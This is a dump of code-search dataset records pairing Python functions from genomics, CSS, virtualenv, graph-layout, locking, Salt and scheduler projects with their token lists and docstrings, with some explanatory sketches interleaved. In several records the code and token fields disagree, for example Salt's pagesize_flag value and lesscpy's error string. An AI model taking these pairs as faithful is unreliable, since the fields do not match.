Dataset schema (one record per function):

    repo              string (7 to 54 chars)
    path              string (4 to 192 chars)
    url               string (87 to 284 chars)
    code              string (78 to 104k chars)
    code_tokens       list
    docstring         string (1 to 46.9k chars)
    docstring_tokens  list
    language          string (1 distinct value)
    partition         string (3 distinct values)
BD2KGenomics/toil-scripts
src/toil_scripts/exome_variant_pipeline/exome_variant_pipeline.py
https://github.com/BD2KGenomics/toil-scripts/blob/f878d863defcdccaabb7fe06f991451b7a198fb7/src/toil_scripts/exome_variant_pipeline/exome_variant_pipeline.py#L85-L96
def index_bams(job, config):
    """
    Convenience job for handling bam indexing to make the workflow declaration cleaner

    :param JobFunctionWrappingJob job: passed automatically by Toil
    :param Namespace config: Argparse Namespace object containing argument inputs
    """
    job.fileStore.logToMaster('Indexed sample BAMS: ' + config.uuid)
    disk = '1G' if config.ci_test else '20G'
    config.normal_bai = job.addChildJobFn(run_samtools_index, config.normal_bam, cores=1, disk=disk).rv()
    config.tumor_bai = job.addChildJobFn(run_samtools_index, config.tumor_bam, cores=1, disk=disk).rv()
    job.addFollowOnJobFn(preprocessing_declaration, config)
[ "def", "index_bams", "(", "job", ",", "config", ")", ":", "job", ".", "fileStore", ".", "logToMaster", "(", "'Indexed sample BAMS: '", "+", "config", ".", "uuid", ")", "disk", "=", "'1G'", "if", "config", ".", "ci_test", "else", "'20G'", "config", ".", "normal_bai", "=", "job", ".", "addChildJobFn", "(", "run_samtools_index", ",", "config", ".", "normal_bam", ",", "cores", "=", "1", ",", "disk", "=", "disk", ")", ".", "rv", "(", ")", "config", ".", "tumor_bai", "=", "job", ".", "addChildJobFn", "(", "run_samtools_index", ",", "config", ".", "tumor_bam", ",", "cores", "=", "1", ",", "disk", "=", "disk", ")", ".", "rv", "(", ")", "job", ".", "addFollowOnJobFn", "(", "preprocessing_declaration", ",", "config", ")" ]
Convenience job for handling bam indexing to make the workflow declaration cleaner

:param JobFunctionWrappingJob job: passed automatically by Toil
:param Namespace config: Argparse Namespace object containing argument inputs
[ "Convenience", "job", "for", "handling", "bam", "indexing", "to", "make", "the", "workflow", "declaration", "cleaner" ]
python
train
lesscpy/lesscpy
lesscpy/lessc/parser.py
https://github.com/lesscpy/lesscpy/blob/51e392fb4a3cd4ccfb6175e0e42ce7d2f6b78126/lesscpy/lessc/parser.py#L226-L271
def p_statement_import(self, p):
    """ import_statement : css_import t_ws string t_semicolon
                         | css_import t_ws css_string t_semicolon
                         | css_import t_ws css_string media_query_list t_semicolon
                         | css_import t_ws fcall t_semicolon
                         | css_import t_ws fcall media_query_list t_semicolon
    """
    if self.importlvl > 8:
        raise ImportError(
            'Recursive import level too deep > 8 (circular import ?)')
    if isinstance(p[3], string_types):
        ipath = utility.destring(p[3])
    elif isinstance(p[3], list):
        p[3] = Import(p[3], p.lineno(4)).parse(self.scope)
        ipath = utility.destring(p[3])
    elif isinstance(p[3], Call):
        # NOTE(saschpe): Always in the form of 'url("...");', so parse it
        # and retrieve the inner css_string. This whole func is messy.
        p[3] = p[3].parse(self.scope)  # Store it as string, Statement.fmt expects it.
        ipath = utility.destring(p[3][4:-1])
    fn, fe = os.path.splitext(ipath)
    if not fe or fe.lower() == '.less':
        try:
            cpath = os.path.dirname(os.path.abspath(self.target))
            if not fe:
                ipath += '.less'
            filename = "%s%s%s" % (cpath, os.sep, ipath)
            if os.path.exists(filename):
                recurse = LessParser(
                    importlvl=self.importlvl + 1,
                    verbose=self.verbose,
                    scope=self.scope)
                recurse.parse(filename=filename, debuglevel=0)
                p[0] = recurse.result
            else:
                err = "Cannot import '%s', file not found" % filename
                self.handle_error(err, p.lineno(1), 'W')
                p[0] = None
        except ImportError as e:
            self.handle_error(e, p)
    else:
        p[0] = Statement(list(p)[1:], p.lineno(1))
        p[0].parse(None)
    sys.stdout.flush()
[ "def", "p_statement_import", "(", "self", ",", "p", ")", ":", "#import pdb; pdb.set_trace()", "if", "self", ".", "importlvl", ">", "8", ":", "raise", "ImportError", "(", "'Recrusive import level too deep > 8 (circular import ?)'", ")", "if", "isinstance", "(", "p", "[", "3", "]", ",", "string_types", ")", ":", "ipath", "=", "utility", ".", "destring", "(", "p", "[", "3", "]", ")", "elif", "isinstance", "(", "p", "[", "3", "]", ",", "list", ")", ":", "p", "[", "3", "]", "=", "Import", "(", "p", "[", "3", "]", ",", "p", ".", "lineno", "(", "4", ")", ")", ".", "parse", "(", "self", ".", "scope", ")", "ipath", "=", "utility", ".", "destring", "(", "p", "[", "3", "]", ")", "elif", "isinstance", "(", "p", "[", "3", "]", ",", "Call", ")", ":", "# NOTE(saschpe): Always in the form of 'url(\"...\");', so parse it", "# and retrieve the inner css_string. This whole func is messy.", "p", "[", "3", "]", "=", "p", "[", "3", "]", ".", "parse", "(", "self", ".", "scope", ")", "# Store it as string, Statement.fmt expects it.", "ipath", "=", "utility", ".", "destring", "(", "p", "[", "3", "]", "[", "4", ":", "-", "1", "]", ")", "fn", ",", "fe", "=", "os", ".", "path", ".", "splitext", "(", "ipath", ")", "if", "not", "fe", "or", "fe", ".", "lower", "(", ")", "==", "'.less'", ":", "try", ":", "cpath", "=", "os", ".", "path", ".", "dirname", "(", "os", ".", "path", ".", "abspath", "(", "self", ".", "target", ")", ")", "if", "not", "fe", ":", "ipath", "+=", "'.less'", "filename", "=", "\"%s%s%s\"", "%", "(", "cpath", ",", "os", ".", "sep", ",", "ipath", ")", "if", "os", ".", "path", ".", "exists", "(", "filename", ")", ":", "recurse", "=", "LessParser", "(", "importlvl", "=", "self", ".", "importlvl", "+", "1", ",", "verbose", "=", "self", ".", "verbose", ",", "scope", "=", "self", ".", "scope", ")", "recurse", ".", "parse", "(", "filename", "=", "filename", ",", "debuglevel", "=", "0", ")", "p", "[", "0", "]", "=", "recurse", ".", "result", "else", ":", "err", "=", "\"Cannot import '%s', file not found\"", "%", "filename", "self", ".", "handle_error", "(", "err", ",", "p", ".", "lineno", "(", "1", ")", ",", "'W'", ")", "p", "[", "0", "]", "=", "None", "except", "ImportError", "as", "e", ":", "self", ".", "handle_error", "(", "e", ",", "p", ")", "else", ":", "p", "[", "0", "]", "=", "Statement", "(", "list", "(", "p", ")", "[", "1", ":", "]", ",", "p", ".", "lineno", "(", "1", ")", ")", "p", "[", "0", "]", ".", "parse", "(", "None", ")", "sys", ".", "stdout", ".", "flush", "(", ")" ]
import_statement : css_import t_ws string t_semicolon
                 | css_import t_ws css_string t_semicolon
                 | css_import t_ws css_string media_query_list t_semicolon
                 | css_import t_ws fcall t_semicolon
                 | css_import t_ws fcall media_query_list t_semicolon
[ "import_statement", ":", "css_import", "t_ws", "string", "t_semicolon", "|", "css_import", "t_ws", "css_string", "t_semicolon", "|", "css_import", "t_ws", "css_string", "media_query_list", "t_semicolon", "|", "css_import", "t_ws", "fcall", "t_semicolon", "|", "css_import", "t_ws", "fcall", "media_query_list", "t_semicolon" ]
python
valid
apache/incubator-heron
heron/tools/tracker/src/python/topology.py
https://github.com/apache/incubator-heron/blob/ad10325a0febe89ad337e561ebcbe37ec5d9a5ac/heron/tools/tracker/src/python/topology.py#L95-L102
def unregister_watch(self, uid):
    """
    Unregister the watch with the given UUID.
    """
    # Do not raise an error if UUID is
    # not present in the watches.
    Log.info("Unregister a watch with uid: " + str(uid))
    self.watches.pop(uid, None)
[ "def", "unregister_watch", "(", "self", ",", "uid", ")", ":", "# Do not raise an error if UUID is", "# not present in the watches.", "Log", ".", "info", "(", "\"Unregister a watch with uid: \"", "+", "str", "(", "uid", ")", ")", "self", ".", "watches", ".", "pop", "(", "uid", ",", "None", ")" ]
Unregister the watch with the given UUID.
[ "Unregister", "the", "watch", "with", "the", "given", "UUID", "." ]
python
valid
nerdvegas/rez
src/build_utils/virtualenv/virtualenv.py
https://github.com/nerdvegas/rez/blob/1d3b846d53b5b5404edfe8ddb9083f9ceec8c5e7/src/build_utils/virtualenv/virtualenv.py#L1569-L1591
def resolve_interpreter(exe):
    """
    If the executable given isn't an absolute path, search $PATH for the interpreter
    """
    # If the "executable" is a version number, get the installed executable for
    # that version
    python_versions = get_installed_pythons()
    if exe in python_versions:
        exe = python_versions[exe]

    if os.path.abspath(exe) != exe:
        paths = os.environ.get('PATH', '').split(os.pathsep)
        for path in paths:
            if os.path.exists(os.path.join(path, exe)):
                exe = os.path.join(path, exe)
                break
    if not os.path.exists(exe):
        logger.fatal('The executable %s (from --python=%s) does not exist' % (exe, exe))
        raise SystemExit(3)
    if not is_executable(exe):
        logger.fatal('The executable %s (from --python=%s) is not executable' % (exe, exe))
        raise SystemExit(3)
    return exe
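The hand-rolled $PATH walk above predates `shutil.which`; on Python 3 the same lookup can be sketched with the standard library alone. A minimal standalone sketch, not virtualenv's implementation (`get_installed_pythons` is replaced by a hypothetical version map):

import os
import shutil

def resolve_interpreter_sketch(exe, version_map=None):
    # Map a bare version number like '3.9' to a known executable (hypothetical map).
    version_map = version_map or {}
    exe = version_map.get(exe, exe)
    # For non-absolute paths, shutil.which performs the $PATH search.
    if not os.path.isabs(exe):
        found = shutil.which(exe)
        if found is None:
            raise SystemExit(3)
        exe = found
    # shutil.which already checks the executable bit; absolute paths still need both checks.
    if not (os.path.exists(exe) and os.access(exe, os.X_OK)):
        raise SystemExit(3)
    return exe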
[ "def", "resolve_interpreter", "(", "exe", ")", ":", "# If the \"executable\" is a version number, get the installed executable for", "# that version", "python_versions", "=", "get_installed_pythons", "(", ")", "if", "exe", "in", "python_versions", ":", "exe", "=", "python_versions", "[", "exe", "]", "if", "os", ".", "path", ".", "abspath", "(", "exe", ")", "!=", "exe", ":", "paths", "=", "os", ".", "environ", ".", "get", "(", "'PATH'", ",", "''", ")", ".", "split", "(", "os", ".", "pathsep", ")", "for", "path", "in", "paths", ":", "if", "os", ".", "path", ".", "exists", "(", "os", ".", "path", ".", "join", "(", "path", ",", "exe", ")", ")", ":", "exe", "=", "os", ".", "path", ".", "join", "(", "path", ",", "exe", ")", "break", "if", "not", "os", ".", "path", ".", "exists", "(", "exe", ")", ":", "logger", ".", "fatal", "(", "'The executable %s (from --python=%s) does not exist'", "%", "(", "exe", ",", "exe", ")", ")", "raise", "SystemExit", "(", "3", ")", "if", "not", "is_executable", "(", "exe", ")", ":", "logger", ".", "fatal", "(", "'The executable %s (from --python=%s) is not executable'", "%", "(", "exe", ",", "exe", ")", ")", "raise", "SystemExit", "(", "3", ")", "return", "exe" ]
If the executable given isn't an absolute path, search $PATH for the interpreter
[ "If", "the", "executable", "given", "isn", "t", "an", "absolute", "path", "search", "$PATH", "for", "the", "interpreter" ]
python
train
bdcht/grandalf
grandalf/layouts.py
https://github.com/bdcht/grandalf/blob/b0a604afa79e5201eebe5feb56ae5ec7afc07b95/grandalf/layouts.py#L378-L404
def init_all(self, roots=None, inverted_edges=None, optimize=False):
    """initializes the layout algorithm by computing roots (unless provided),
    inverted edges (unless provided), vertices ranks and creates all dummy
    vertices and layers.

    Parameters:
        roots (list[Vertex]): set *root* vertices (layer 0)
        inverted_edges (list[Edge]): set edges to invert to have a DAG.
        optimize (bool): optimize ranking if True (default False)
    """
    if self.initdone:
        return
    # For layered sugiyama algorithm, the input graph must be acyclic,
    # so we must provide a list of root nodes and a list of inverted edges.
    if roots is None:
        roots = [v for v in self.g.sV if len(v.e_in()) == 0]
    if inverted_edges is None:
        L = self.g.get_scs_with_feedback(roots)
        inverted_edges = [x for x in self.g.sE if x.feedback]
    self.alt_e = inverted_edges
    # assign rank to all vertices:
    self.rank_all(roots, optimize)
    # add dummy vertex/edge for 'long' edges:
    for e in self.g.E():
        self.setdummies(e)
    # precompute some layers values:
    for l in self.layers:
        l.setup(self)
    self.initdone = True
[ "def", "init_all", "(", "self", ",", "roots", "=", "None", ",", "inverted_edges", "=", "None", ",", "optimize", "=", "False", ")", ":", "if", "self", ".", "initdone", ":", "return", "# For layered sugiyama algorithm, the input graph must be acyclic,", "# so we must provide a list of root nodes and a list of inverted edges.", "if", "roots", "==", "None", ":", "roots", "=", "[", "v", "for", "v", "in", "self", ".", "g", ".", "sV", "if", "len", "(", "v", ".", "e_in", "(", ")", ")", "==", "0", "]", "if", "inverted_edges", "==", "None", ":", "L", "=", "self", ".", "g", ".", "get_scs_with_feedback", "(", "roots", ")", "inverted_edges", "=", "[", "x", "for", "x", "in", "self", ".", "g", ".", "sE", "if", "x", ".", "feedback", "]", "self", ".", "alt_e", "=", "inverted_edges", "# assign rank to all vertices:", "self", ".", "rank_all", "(", "roots", ",", "optimize", ")", "# add dummy vertex/edge for 'long' edges:", "for", "e", "in", "self", ".", "g", ".", "E", "(", ")", ":", "self", ".", "setdummies", "(", "e", ")", "# precompute some layers values:", "for", "l", "in", "self", ".", "layers", ":", "l", ".", "setup", "(", "self", ")", "self", ".", "initdone", "=", "True" ]
initializes the layout algorithm by computing roots (unless provided), inverted edges (unless provided), vertices ranks and creates all dummy vertices and layers.

Parameters:
    roots (list[Vertex]): set *root* vertices (layer 0)
    inverted_edges (list[Edge]): set edges to invert to have a DAG.
    optimize (bool): optimize ranking if True (default False)
[ "initializes", "the", "layout", "algorithm", "by", "computing", "roots", "(", "unless", "provided", ")", "inverted", "edges", "(", "unless", "provided", ")", "vertices", "ranks", "and", "creates", "all", "dummy", "vertices", "and", "layers", ".", "Parameters", ":", "roots", "(", "list", "[", "Vertex", "]", ")", ":", "set", "*", "root", "*", "vertices", "(", "layer", "0", ")", "inverted_edges", "(", "list", "[", "Edge", "]", ")", ":", "set", "edges", "to", "invert", "to", "have", "a", "DAG", ".", "optimize", "(", "bool", ")", ":", "optimize", "ranking", "if", "True", "(", "default", "False", ")" ]
python
train
wtsi-hgi/consul-lock
consullock/managers.py
https://github.com/wtsi-hgi/consul-lock/blob/deb07ab41dabbb49f4d0bbc062bc3b4b6e5d71b2/consullock/managers.py#L296-L305
def release_all(self, keys: Sequence[str]) -> Set[str]:
    """
    Releases all of the given keys.
    :param keys: the keys to release
    :return: the names of the keys that were released
    """
    released: List[str] = []
    for key in keys:
        released.append(self.release(key))
    return set(filter(None, released))
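The `filter(None, released)` idiom drops falsy entries, so a `release()` that returns `None` for keys it did not hold never pollutes the result set. A minimal sketch of that pattern with a hypothetical `release` function:

from typing import Optional, Sequence, Set

def release(key: str) -> Optional[str]:
    # Hypothetical stand-in: pretend only keys starting with 'held-' were locked.
    return key if key.startswith('held-') else None

def release_all(keys: Sequence[str]) -> Set[str]:
    released = [release(key) for key in keys]
    return set(filter(None, released))  # None entries are dropped

assert release_all(['held-a', 'other', 'held-b']) == {'held-a', 'held-b'}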
[ "def", "release_all", "(", "self", ",", "keys", ":", "Sequence", "[", "str", "]", ")", "->", "Set", "[", "str", "]", ":", "released", ":", "List", "[", "str", "]", "=", "[", "]", "for", "key", "in", "keys", ":", "released", ".", "append", "(", "self", ".", "release", "(", "key", ")", ")", "return", "set", "(", "filter", "(", "None", ",", "released", ")", ")" ]
Releases all of the given keys.

:param keys: the keys to release
:return: the names of the keys that were released
[ "Releases", "all", "of", "the", "given", "keys", ".", ":", "param", "keys", ":", "the", "keys", "to", "release", ":", "return", ":", "the", "names", "of", "the", "keys", "that", "were", "released" ]
python
train
saltstack/salt
salt/modules/status.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/modules/status.py#L444-L604
def meminfo():
    '''
    Return the memory info for this minion

    .. versionchanged:: 2016.11.4
        Added support for AIX

    .. versionchanged:: 2018.3.0
        Added support for OpenBSD

    CLI Example:

    .. code-block:: bash

        salt '*' status.meminfo
    '''
    def linux_meminfo():
        '''
        linux specific implementation of meminfo
        '''
        ret = {}
        try:
            with salt.utils.files.fopen('/proc/meminfo', 'r') as fp_:
                stats = salt.utils.stringutils.to_unicode(fp_.read())
        except IOError:
            pass
        else:
            for line in stats.splitlines():
                if not line:
                    continue
                comps = line.split()
                comps[0] = comps[0].replace(':', '')
                ret[comps[0]] = {
                    'value': comps[1],
                }
                if len(comps) > 2:
                    ret[comps[0]]['unit'] = comps[2]
        return ret

    def freebsd_meminfo():
        '''
        freebsd specific implementation of meminfo
        '''
        sysctlvm = __salt__['cmd.run']('sysctl vm').splitlines()
        sysctlvm = [x for x in sysctlvm if x.startswith('vm')]
        sysctlvm = [x.split(':') for x in sysctlvm]
        sysctlvm = [[y.strip() for y in x] for x in sysctlvm]
        sysctlvm = [x for x in sysctlvm if x[1]]  # If x[1] not empty

        ret = {}
        for line in sysctlvm:
            ret[line[0]] = line[1]
        # Special handling for vm.total as it's especially important
        sysctlvmtot = __salt__['cmd.run']('sysctl -n vm.vmtotal').splitlines()
        sysctlvmtot = [x for x in sysctlvmtot if x]
        ret['vm.vmtotal'] = sysctlvmtot
        return ret

    def aix_meminfo():
        '''
        AIX specific implementation of meminfo
        '''
        ret = {}
        ret['svmon'] = []
        ret['vmstat'] = []
        procn = None
        fields = []
        pagesize_flag = False
        for line in __salt__['cmd.run']('svmon -G').splitlines():
            # Note: svmon is per-system
            #              size       inuse        free         pin     virtual  mmode
            #memory     1048576     1039740        8836      285078      474993    Ded
            #pg space    917504        2574
            #
            #              work        pers        clnt       other
            #pin         248379           0        2107       34592
            #in use      474993           0      564747
            #
            #PageSize  PoolSize       inuse        pgsp         pin     virtual
            #s    4 KB        -      666956        2574       60726      102209
            #m   64 KB        -       23299           0       14022       23299
            if not line:
                continue
            if re.match(r'\s', line):
                # assume fields line
                fields = line.split()
                continue
            if line.startswith('memory') or line.startswith('pin'):
                procn = len(ret['svmon'])
                ret['svmon'].append({})
                comps = line.split()
                ret['svmon'][procn][comps[0]] = {}
                for i in range(0, len(fields)):
                    if len(comps) > i + 1:
                        ret['svmon'][procn][comps[0]][fields[i]] = comps[i+1]
                continue
            if line.startswith('pg space') or line.startswith('in use'):
                procn = len(ret['svmon'])
                ret['svmon'].append({})
                comps = line.split()
                pg_space = '{0} {1}'.format(comps[0], comps[1])
                ret['svmon'][procn][pg_space] = {}
                for i in range(0, len(fields)):
                    if len(comps) > i + 2:
                        ret['svmon'][procn][pg_space][fields[i]] = comps[i+2]
                continue
            if line.startswith('PageSize'):
                fields = line.split()
                # mark the following lines as per-pagesize rows
                pagesize_flag = True
                continue
            if pagesize_flag:
                procn = len(ret['svmon'])
                ret['svmon'].append({})
                comps = line.split()
                ret['svmon'][procn][comps[0]] = {}
                for i in range(0, len(fields)):
                    if len(comps) > i:
                        ret['svmon'][procn][comps[0]][fields[i]] = comps[i]
                continue

        for line in __salt__['cmd.run']('vmstat -v').splitlines():
            # Note: vmstat is per-system
            if not line:
                continue
            procn = len(ret['vmstat'])
            ret['vmstat'].append({})
            comps = line.lstrip().split(' ', 1)
            ret['vmstat'][procn][comps[1]] = comps[0]
        return ret

    def openbsd_meminfo():
        '''
        openbsd specific implementation of meminfo
        '''
        vmstat = __salt__['cmd.run']('vmstat').splitlines()
        # We're only interested in memory and page values which are printed
        # as subsequent fields.
        fields = ['active virtual pages', 'free list size', 'page faults',
                  'pages reclaimed', 'pages paged in', 'pages paged out',
                  'pages freed', 'pages scanned']
        data = vmstat[2].split()[2:10]
        ret = dict(zip(fields, data))
        return ret

    # dict that returns the function that does the right thing per platform
    get_version = {
        'Linux': linux_meminfo,
        'FreeBSD': freebsd_meminfo,
        'OpenBSD': openbsd_meminfo,
        'AIX': aix_meminfo,
    }

    errmsg = 'This method is unsupported on the current operating system!'
    return get_version.get(__grains__['kernel'], lambda: errmsg)()
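The closing lines use a dispatch dict with a `dict.get` fallback instead of an `if/elif` chain over platforms. A standalone sketch of the pattern (platform names and handlers are illustrative, not Salt's):

def linux_handler():
    return {'platform': 'Linux'}

def freebsd_handler():
    return {'platform': 'FreeBSD'}

def dispatch(kernel):
    handlers = {
        'Linux': linux_handler,
        'FreeBSD': freebsd_handler,
    }
    errmsg = 'unsupported platform'
    # dict.get returns the fallback lambda when the kernel is unknown;
    # the trailing () calls whichever function was selected.
    return handlers.get(kernel, lambda: errmsg)()

assert dispatch('Linux') == {'platform': 'Linux'}
assert dispatch('Plan9') == 'unsupported platform'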
[ "def", "meminfo", "(", ")", ":", "def", "linux_meminfo", "(", ")", ":", "'''\n linux specific implementation of meminfo\n '''", "ret", "=", "{", "}", "try", ":", "with", "salt", ".", "utils", ".", "files", ".", "fopen", "(", "'/proc/meminfo'", ",", "'r'", ")", "as", "fp_", ":", "stats", "=", "salt", ".", "utils", ".", "stringutils", ".", "to_unicode", "(", "fp_", ".", "read", "(", ")", ")", "except", "IOError", ":", "pass", "else", ":", "for", "line", "in", "stats", ".", "splitlines", "(", ")", ":", "if", "not", "line", ":", "continue", "comps", "=", "line", ".", "split", "(", ")", "comps", "[", "0", "]", "=", "comps", "[", "0", "]", ".", "replace", "(", "':'", ",", "''", ")", "ret", "[", "comps", "[", "0", "]", "]", "=", "{", "'value'", ":", "comps", "[", "1", "]", ",", "}", "if", "len", "(", "comps", ")", ">", "2", ":", "ret", "[", "comps", "[", "0", "]", "]", "[", "'unit'", "]", "=", "comps", "[", "2", "]", "return", "ret", "def", "freebsd_meminfo", "(", ")", ":", "'''\n freebsd specific implementation of meminfo\n '''", "sysctlvm", "=", "__salt__", "[", "'cmd.run'", "]", "(", "'sysctl vm'", ")", ".", "splitlines", "(", ")", "sysctlvm", "=", "[", "x", "for", "x", "in", "sysctlvm", "if", "x", ".", "startswith", "(", "'vm'", ")", "]", "sysctlvm", "=", "[", "x", ".", "split", "(", "':'", ")", "for", "x", "in", "sysctlvm", "]", "sysctlvm", "=", "[", "[", "y", ".", "strip", "(", ")", "for", "y", "in", "x", "]", "for", "x", "in", "sysctlvm", "]", "sysctlvm", "=", "[", "x", "for", "x", "in", "sysctlvm", "if", "x", "[", "1", "]", "]", "# If x[1] not empty", "ret", "=", "{", "}", "for", "line", "in", "sysctlvm", ":", "ret", "[", "line", "[", "0", "]", "]", "=", "line", "[", "1", "]", "# Special handling for vm.total as it's especially important", "sysctlvmtot", "=", "__salt__", "[", "'cmd.run'", "]", "(", "'sysctl -n vm.vmtotal'", ")", ".", "splitlines", "(", ")", "sysctlvmtot", "=", "[", "x", "for", "x", "in", "sysctlvmtot", "if", "x", "]", "ret", "[", "'vm.vmtotal'", "]", "=", "sysctlvmtot", "return", "ret", "def", "aix_meminfo", "(", ")", ":", "'''\n AIX specific implementation of meminfo\n '''", "ret", "=", "{", "}", "ret", "[", "'svmon'", "]", "=", "[", "]", "ret", "[", "'vmstat'", "]", "=", "[", "]", "procn", "=", "None", "fields", "=", "[", "]", "pagesize_flag", "=", "False", "for", "line", "in", "__salt__", "[", "'cmd.run'", "]", "(", "'svmon -G'", ")", ".", "splitlines", "(", ")", ":", "# Note: svmon is per-system", "# size inuse free pin virtual mmode", "#memory 1048576 1039740 8836 285078 474993 Ded", "#pg space 917504 2574", "#", "# work pers clnt other", "#pin 248379 0 2107 34592", "#in use 474993 0 564747", "#", "#PageSize PoolSize inuse pgsp pin virtual", "#s 4 KB - 666956 2574 60726 102209", "#m 64 KB - 23299 0 14022 23299", "if", "not", "line", ":", "continue", "if", "re", ".", "match", "(", "r'\\s'", ",", "line", ")", ":", "# assume fields line", "fields", "=", "line", ".", "split", "(", ")", "continue", "if", "line", ".", "startswith", "(", "'memory'", ")", "or", "line", ".", "startswith", "(", "'pin'", ")", ":", "procn", "=", "len", "(", "ret", "[", "'svmon'", "]", ")", "ret", "[", "'svmon'", "]", ".", "append", "(", "{", "}", ")", "comps", "=", "line", ".", "split", "(", ")", "ret", "[", "'svmon'", "]", "[", "procn", "]", "[", "comps", "[", "0", "]", "]", "=", "{", "}", "for", "i", "in", "range", "(", "0", ",", "len", "(", "fields", ")", ")", ":", "if", "len", "(", "comps", ")", ">", "i", "+", "1", ":", "ret", "[", "'svmon'", "]", "[", "procn", "]", "[", "comps", "[", "0", 
"]", "]", "[", "fields", "[", "i", "]", "]", "=", "comps", "[", "i", "+", "1", "]", "continue", "if", "line", ".", "startswith", "(", "'pg space'", ")", "or", "line", ".", "startswith", "(", "'in use'", ")", ":", "procn", "=", "len", "(", "ret", "[", "'svmon'", "]", ")", "ret", "[", "'svmon'", "]", ".", "append", "(", "{", "}", ")", "comps", "=", "line", ".", "split", "(", ")", "pg_space", "=", "'{0} {1}'", ".", "format", "(", "comps", "[", "0", "]", ",", "comps", "[", "1", "]", ")", "ret", "[", "'svmon'", "]", "[", "procn", "]", "[", "pg_space", "]", "=", "{", "}", "for", "i", "in", "range", "(", "0", ",", "len", "(", "fields", ")", ")", ":", "if", "len", "(", "comps", ")", ">", "i", "+", "2", ":", "ret", "[", "'svmon'", "]", "[", "procn", "]", "[", "pg_space", "]", "[", "fields", "[", "i", "]", "]", "=", "comps", "[", "i", "+", "2", "]", "continue", "if", "line", ".", "startswith", "(", "'PageSize'", ")", ":", "fields", "=", "line", ".", "split", "(", ")", "pagesize_flag", "=", "False", "continue", "if", "pagesize_flag", ":", "procn", "=", "len", "(", "ret", "[", "'svmon'", "]", ")", "ret", "[", "'svmon'", "]", ".", "append", "(", "{", "}", ")", "comps", "=", "line", ".", "split", "(", ")", "ret", "[", "'svmon'", "]", "[", "procn", "]", "[", "comps", "[", "0", "]", "]", "=", "{", "}", "for", "i", "in", "range", "(", "0", ",", "len", "(", "fields", ")", ")", ":", "if", "len", "(", "comps", ")", ">", "i", ":", "ret", "[", "'svmon'", "]", "[", "procn", "]", "[", "comps", "[", "0", "]", "]", "[", "fields", "[", "i", "]", "]", "=", "comps", "[", "i", "]", "continue", "for", "line", "in", "__salt__", "[", "'cmd.run'", "]", "(", "'vmstat -v'", ")", ".", "splitlines", "(", ")", ":", "# Note: vmstat is per-system", "if", "not", "line", ":", "continue", "procn", "=", "len", "(", "ret", "[", "'vmstat'", "]", ")", "ret", "[", "'vmstat'", "]", ".", "append", "(", "{", "}", ")", "comps", "=", "line", ".", "lstrip", "(", ")", ".", "split", "(", "' '", ",", "1", ")", "ret", "[", "'vmstat'", "]", "[", "procn", "]", "[", "comps", "[", "1", "]", "]", "=", "comps", "[", "0", "]", "return", "ret", "def", "openbsd_meminfo", "(", ")", ":", "'''\n openbsd specific implementation of meminfo\n '''", "vmstat", "=", "__salt__", "[", "'cmd.run'", "]", "(", "'vmstat'", ")", ".", "splitlines", "(", ")", "# We're only interested in memory and page values which are printed", "# as subsequent fields.", "fields", "=", "[", "'active virtual pages'", ",", "'free list size'", ",", "'page faults'", ",", "'pages reclaimed'", ",", "'pages paged in'", ",", "'pages paged out'", ",", "'pages freed'", ",", "'pages scanned'", "]", "data", "=", "vmstat", "[", "2", "]", ".", "split", "(", ")", "[", "2", ":", "10", "]", "ret", "=", "dict", "(", "zip", "(", "fields", ",", "data", ")", ")", "return", "ret", "# dict that return a function that does the right thing per platform", "get_version", "=", "{", "'Linux'", ":", "linux_meminfo", ",", "'FreeBSD'", ":", "freebsd_meminfo", ",", "'OpenBSD'", ":", "openbsd_meminfo", ",", "'AIX'", ":", "aix_meminfo", ",", "}", "errmsg", "=", "'This method is unsupported on the current operating system!'", "return", "get_version", ".", "get", "(", "__grains__", "[", "'kernel'", "]", ",", "lambda", ":", "errmsg", ")", "(", ")" ]
Return the memory info for this minion

.. versionchanged:: 2016.11.4
    Added support for AIX

.. versionchanged:: 2018.3.0
    Added support for OpenBSD

CLI Example:

.. code-block:: bash

    salt '*' status.meminfo
[ "Return", "the", "memory", "info", "for", "this", "minion" ]
python
train
mushkevych/scheduler
synergy/scheduler/state_machine_recomputing.py
https://github.com/mushkevych/scheduler/blob/6740331360f49083c208085fb5a60ce80ebf418b/synergy/scheduler/state_machine_recomputing.py#L65-L75
def _compute_and_transfer_to_final_run(self, process_name, start_timeperiod, end_timeperiod, job_record):
    """ method computes new unit_of_work and transfers the job to STATE_FINAL_RUN;
    it also shares _fuzzy_ DuplicateKeyError logic from the _compute_and_transfer_to_progress method """
    source_collection_name = context.process_context[process_name].source
    start_id = self.ds.highest_primary_key(source_collection_name, start_timeperiod, end_timeperiod)
    end_id = self.ds.lowest_primary_key(source_collection_name, start_timeperiod, end_timeperiod)

    uow, transfer_to_final = self.insert_and_publish_uow(job_record, start_id, end_id)
    self.update_job(job_record, uow, job.STATE_FINAL_RUN)

    if transfer_to_final:
        self._process_state_final_run(job_record)
[ "def", "_compute_and_transfer_to_final_run", "(", "self", ",", "process_name", ",", "start_timeperiod", ",", "end_timeperiod", ",", "job_record", ")", ":", "source_collection_name", "=", "context", ".", "process_context", "[", "process_name", "]", ".", "source", "start_id", "=", "self", ".", "ds", ".", "highest_primary_key", "(", "source_collection_name", ",", "start_timeperiod", ",", "end_timeperiod", ")", "end_id", "=", "self", ".", "ds", ".", "lowest_primary_key", "(", "source_collection_name", ",", "start_timeperiod", ",", "end_timeperiod", ")", "uow", ",", "transfer_to_final", "=", "self", ".", "insert_and_publish_uow", "(", "job_record", ",", "start_id", ",", "end_id", ")", "self", ".", "update_job", "(", "job_record", ",", "uow", ",", "job", ".", "STATE_FINAL_RUN", ")", "if", "transfer_to_final", ":", "self", ".", "_process_state_final_run", "(", "job_record", ")" ]
method computes new unit_of_work and transfers the job to STATE_FINAL_RUN; it also shares _fuzzy_ DuplicateKeyError logic from the _compute_and_transfer_to_progress method
[ "method", "computes", "new", "unit_of_work", "and", "transfers", "the", "job", "to", "STATE_FINAL_RUN", "it", "also", "shares", "_fuzzy_", "DuplicateKeyError", "logic", "from", "_compute_and_transfer_to_progress", "method" ]
python
train
globocom/GloboNetworkAPI-client-python
networkapiclient/Ip.py
https://github.com/globocom/GloboNetworkAPI-client-python/blob/cf34f913da48d9abbf750114f5d2ac4b2dde137d/networkapiclient/Ip.py#L241-L273
def check_vip_ip(self, ip, id_evip):
    """
    Get an IPv4 or IPv6 for a Vip request

    :param ip: IPv4 or IPv6. 'xxx.xxx.xxx.xxx or xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx'
